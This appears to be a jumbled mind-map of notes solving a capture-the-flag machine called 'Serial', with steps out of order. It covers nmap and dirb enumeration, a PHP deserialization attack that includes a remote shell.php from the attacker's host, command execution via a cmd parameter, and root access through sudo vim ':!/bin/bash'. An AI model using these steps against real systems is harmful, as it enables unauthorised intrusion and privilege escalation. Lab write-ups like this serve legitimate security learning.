Please enable JavaScript.
Coggle requires JavaScript to display documents.
Serial 1 (28.check file contents (31.log.class.php (32. add echo base64…
Serial 1
28.check file contents
30.class.php
31.log.class.php
32.
add echo base64_encode(serialize(new User('admin')));
29.index.php
(2) Enumeration
8 Browsing website
9.Browsed the website on port 80
10.Got message that sk4 is beta test for cookie handler
42.tried base64 encoded vaue on webpage
Burp suit
intercepted request
13.set target
14 provide base64 encoded value
decode
16.username given by value
17.donot change anything
43.got passwrd file shows vlunerablity
(3).expoiltation n analyze
34.php user.class.php
49 ,41.again
33.run php code
35.gedit
39.user class
echo base64_encode(serialize(new User('admin')));
40.edit new log
36.log.class.php
37.give variable path
38./etc/passwd
47.edit change path as url of shell
48."
http://192.168.2.3/shell.php
"
(1). Penetrating Methodolgy
2 Scaning
3.NMap
Nmap -sn 10.0.2.1/24 to find ip of victim
5.ip is 10.0.2.9
nmap 10..0.2.9 to findopen ports
7.found http 80 ,ssh 22 ports open
18.Drib
19.tried to get in directories
20..dirb
http://10.0.2.9
21.got backup directory
23.visited backup dir on webserver
24.found bak.zip
download zip
26.wget
http://10.0.2.9/backup/bak.zip
27.unzip bak.zip
44.remote code execution file
45.nano shell.php
46.start python server
50.cmd parameter with ifconfig command.
51.found a file named credentials.txt.bak
52.use credentials
53.find first flag
54.ssh
sk4@10.0.2.9
entr pass
got access to serial
55.cat flag.txt
(4).Escalation
56.permissions
sudo vim
:!/bin/bash
sudo-l
cd /root
cat flag.txt
got it :red_flag: